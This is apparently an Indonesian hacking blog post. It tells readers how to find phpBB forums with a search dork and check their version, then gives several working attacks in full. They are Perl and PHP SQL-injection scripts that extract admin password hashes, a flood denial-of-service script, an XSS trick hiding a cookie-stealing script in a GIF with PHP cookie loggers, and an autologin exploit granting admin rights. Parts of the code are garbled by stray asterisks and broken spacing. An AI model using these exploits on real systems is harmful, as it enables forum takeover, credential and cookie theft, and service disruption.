cari targetnya dl....
pake dork ini bisa
"Powered by phpBB"
kl dah nemu tinggal di cek versi berapanya gitu...
caranya pake direktori ini www.site.com/forum/docs/CHANGELOG.htm
kl dah ta versinya sekarang nyari exploitnya...
ni ada beberpa exploit
1.phpBB Remote Exploit 2.0.x
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * работает только с mysql v>4.0
## * работает только если на форуме не удалено самое первое сообщение
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|************************************************* ***************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|************************************************* ***************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%2 0concat(char(97,58,55,58,123,115,58,49,52,58,34,11 5,101,97,114,99,104,95,114,101,115,117,
108,116,115,34,59,115,58,49,58,34,49,34,59,115,58, 49,55,58,34,116,111,116,97,108
,
95,109,97,116,99,104,95,99,111,117,110,116,34,59,1 05,58,53,59,115,58,49,50,58,34
,
115,112,108,105,116,95,115,101,97,114,99,104,34,59 ,97,58,49,58,123,105,58,48,59,
1
15,58,51,50,58,34),user_password,char(34,59,125,11 5,58,55,58,34,115,111,114,116,95,98,121,34,59,105, 58,48,59,115,5
8,56,58,34,115,111,114,116,95,100,105,114,34,59,11 5,58,52,58,34,68,69,83,67,34,5
9
,115,58,49,50,58,34,115,104,111,119,95,114,101,115 ,117,108,116,115,34,59,115,58,
5
4,58,34,116,111,112,105,99,115,34,59,115,58,49,50, 58,34,114,101,116,117,114,110,
9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) %20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o 2. phpBB 2.0.19 DOS Vulnerability
#!/usr/bin/perl
#######################################
##********* *********Recoded by: mix2mix and Elioni of http://ahg-khf.org
##********* *********And h4cky0u Security Forums (http://h4cky0u.org)
##********* *********Name: phpBBDoSReloaded
##********* *********Original Author: HaCkZaTaN of Neo Security Team
##********* *********Tested on phpBB 2.0.19 and earlier versions
##********* *********Ported to perl by g30rg3_x
##********* *********Date: 25/01/06
#######################################
use IO::Socket;
## Initialized X
$x = 0;
print q(
********* phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
********* Recoded by Albanian Hackers Group &
********* h4cky0u Security Forums
); print q(Host |without-> http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example-> /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = <STDIN>;
chop ($type);
## Tipi p*********r regjistrim
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999) {
## Antari q********* regjistrohet automatikisht********* "X"
$uname = "username=AHG__" . "$x";
## Emaili q********* regjistrohet ne baz*********n "X"
$umail = "&email=AHG__" . "$x";
$postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
$lrg = length $postit;
my $sock = new IO::Socket::INET ( ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ); die "\nNuk mundem te lidhemi me hostin sepse *********sht dosirat ose nuk egziston: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n";
close($sock);
## Print a "+" for every loop
syswrite STDOUT, "+";
$x++; }
## Tipi 2-sh********* p*********r K*********rkim(Flood)
} elsif ($type == 2){
while($x != 9999) { ## Final Search String to Send
$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Co ncept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET ( ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n";
close($sock);
## Print a "+" for every loop
syswrite STDOUT, "+";
## Increment X in One for every Loop
$x++; } }else{ ## STF??? Qfar********* keni Shtypur
********* *********die "Mund*********sia nuk Lejohet +_-???\n"; } 3.phpBB 3 Remote SQL Injection Exploit
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host:********* ********* ********* target server (ip/hostname)\n";
echo "path:********* ********* ********* path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo "********* *********-T[prefix]********* *********specify a table prefix different from default (phpbb_)\n";
echo "********* *********-p[port]:********* ********* specify a port other than 80\n";
echo "********* *********-P[ip:port]: specify a proxy\n";
echo "********* *********-u[number]:********* specify a user id other than 2 (admin)\n";
echo "********* *********-x:********* ********* ********* ********* ********* disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
********* $result='';$exa='';$cont=0;
********* for ($i=0; $i<=strlen($string)-1; $i++)
********* {
********* *********if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
********* *********{$result.="********* .";}
********* *********else
********* *********{$result.="********* ".$string[$i];}
********* *********if (strlen(dechex(ord($string[$i])))==2)
********* *********{$exa.=" ".dechex(ord($string[$i]));}
********* *********else
********* *********{$exa.=" 0".dechex(ord($string[$i]));}
********* *********$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
********* }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\B) ';
function sendpacketii($packet)
{
********* global $proxy, $host, $port, $html, $proxy_regex;
********* if ($proxy=='') {
********* ********* $ock=fsockopen(gethostbyname($host),$port);
********* ********* if (!$ock) {
********* ********* ********* echo 'No response from '.$host.':'.$port; die;
********* ********* }
********* }
********* else {
********* *********$c = preg_match($proxy_regex,$proxy);
********* ********* if (!$c) {
********* ********* ********* echo 'Not a valid proxy...';die;
********* ********* }
********* ********* $parts=explode(':',$proxy);
********* ********* echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
********* ********* $ock=fsockopen($parts[0],$parts[1]);
********* ********* if (!$ock) {
********* ********* ********* echo 'No response from proxy...';die;
********* *********}
********* }
********* fputs($ock,$packet);
********* if ($proxy=='') {
********* ********* $html='';
********* ********* while (!feof($ock)) {
********* ********* ********* $html.=fgets($ock);
********* ********* }
********* }
********* else {
********* ********* $html='';
********* ********* while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
********* ********* ********* $html.=fread($ock,1);
********* ********* }
********* }
********* fclose($ock);
********* #debug
********* #echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
********* $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
********* $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
********* $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
********* $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
********* $discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
********* $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
********* echo "sql -> ".$sql."\n";
********* $sql=urlencode(strtoupper($sql));
********* $data="username=";
********* $data.="&icq=";
********* $data.="&email=";
********* $data.="&aim=";
********* $data.="&joined_select=lt";
********* $data.="&joined=";
********* $data.="&yahoo=";
********* $data.="&active_select=lt";
********* $data.="&active=";
********* $data.="&msn=";
********* $data.="&count_select=eq";
********* $data.="&count=";
********* $data.="&jabber=";
********* $data.="&sk=c";
********* $data.="&sd=a";
********* $data.="&ip=".$sql;
********* $data.="&search_group_id=0";
********* $data.="&submit=Search";
********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
********* $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
********* $packet.="Host: ".$host."\r\n";
********* $packet.="Content-Length: ".strlen($data)."\r\n";
********* $packet.="Connection: Close\r\n";
********* $packet.="Cookie: ".$cookie." \r\n\r\n";
********* $packet.=$data;
********* sendpacketii($packet);
********* if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
********* }
********* if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
********* $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
********* echo "sql -> ".$sql."\n";
********* $sql=urlencode(strtoupper($sql));
********* $data="username=";
********* $data.="&icq=";
********* $data.="&email=";
********* $data.="&aim=";
********* $data.="&joined_select=lt";
********* $data.="&joined=";
********* $data.="&yahoo=";
********* $data.="&active_select=lt";
********* $data.="&active=";
********* $data.="&msn=";
********* $data.="&count_select=eq";
********* $data.="&count=";
********* $data.="&jabber=";
********* $data.="&sk=c";
********* $data.="&sd=a";
********* $data.="&ip=".$sql;
********* $data.="&search_group_id=0";
********* $data.="&submit=Search";
********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
********* $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
********* $packet.="Host: ".$host."\r\n";
********* $packet.="Content-Length: ".strlen($data)."\r\n";
********* $packet.="Connection: Close\r\n";
********* $packet.="Cookie: ".$cookie." \r\n\r\n";
********* $packet.=$data;
********* sendpacketii($packet);
********* if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
********* }
********* if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin********* ********* ********* ********* ********* -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>4. Xss phpBB 3.0
Open a text editor such as "notebook"
Enter the following script********* *********
<script> document.location.replace ( 'http://WWW.SITOWEB/FILE.php?c =' + document.cookie); </ script>
Save the file in img.gif (. GIF)
When you are posting, Vai down on "Attachment uploading"
Show your image.
Now at the bottom are "Posted attachments" and under it your image inserted eg ciao.gif
Now take the direct link of img. Eg:
http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
Now just have to disguise the link
Example:
[url = http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif] Bella girl[/url]
Now all those who use Internet Explorer as your browser, and visit your link ...
Get their cookies.
Log cookies (File.php)
$ Ip = $ _SERVER [ 'REMOTE_ADDR'];
$ UserAgent = $ _SERVER [ 'HTTP_USER_AGENT'];
$Accept $ = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE'];
$Cookie = $ _GET [ 'c'];
$Myemail = "YOUR E-MAIL;
$Date = today ( "l, j F, Y, g: ia");
$Subject = "Xss phpBB 3";
$Message = "Xss phpBB 3 () 2006
Ip: $ ipCookies: $ cookiesBrowser: $ userAgentLanguage: $ accept
URL: Basic $Day & Time: $ today \ n";
$ From = "From: $ myemail \ r \ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>
**************************************
Change: $ myemail = "YOUR E-MAIL;
Eg: [email]tua@mail.com[/email]
**************************************
Log cookies Alternative (File.php)
$ Cookie = $ _GET [ 'c'];
$ Ip = getenv ( 'REMOTE_ADDR');
$ Date = date ( "j F, Y, g: ia");
$ Referer = getenv ( 'HTTP_REFERER');
$ Fp = fopen ( 'file.txt', 'a');
Fwrite ($ fp, 'Cookie:'. $ Cookies. '<br> IP:'. $ Ip. '<br> Date and Time:'. $ Date. '<br> Referer:'. $ Referer. '< br> <br> <br> ');
Fclose ($ fp); Ok, I wasn't too sure on releasing this perl script because it's very accurate and works 90% of the time in getting you admin rights. But like I said it's for educational purposes only. Code below, please don't make me regret this.
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this..
# Moded and fixed by Puri
if (@ARGV < 3)
{
print q(
#-----------------------------------------------------------#
# phpBB2 Exploit (Admin Rights)- Moded and Fixed by Puri #
#-----------------------------------------------------------#
# Usage: [website] [folder] [username] [proxy] #
#-----------------------------------------------------------#
#-----------------------------------------------------------#
# Normal #
#-----------------------------------------------------------#
# Example 1: phpbb2.pl www.site.com / Puri #
# Example 2: phpbb2.pl www.site.com /forum/ Puri #
# Example 3: phpbb2.pl www.site.com /board/ Puri #
# Example 4: phpbb2.pl www.site.com /phpbb/ Puri #
# Example 5: phpbb2.pl www.site.com /phpbb2/ Puri #
#-----------------------------------------------------------#
# With Proxy #
#-----------------------------------------------------------#
# Proxy 1: phpbb2.pl www.site.com / Puri 127.0.0.1:80 #
# Proxy 2: phpbb2.pl www.site.com /forum/ Puri 127.0.0.1:80 #
#-----------------------------------------------------------#
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0", "phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A". "%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/", $host, , , , ,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_lineunless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is easy to hack, lets do it!\n";
} else {
print "Sorry... cant hack this site."; exit();}
print "\nGet $user ID\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_lineunless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Will give $user admin rights\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_lineunless $response->is_success;
print " Done! $user have admin rights now!\n"; Sumber : ZhC Blog
0 komentar:
Posting Komentar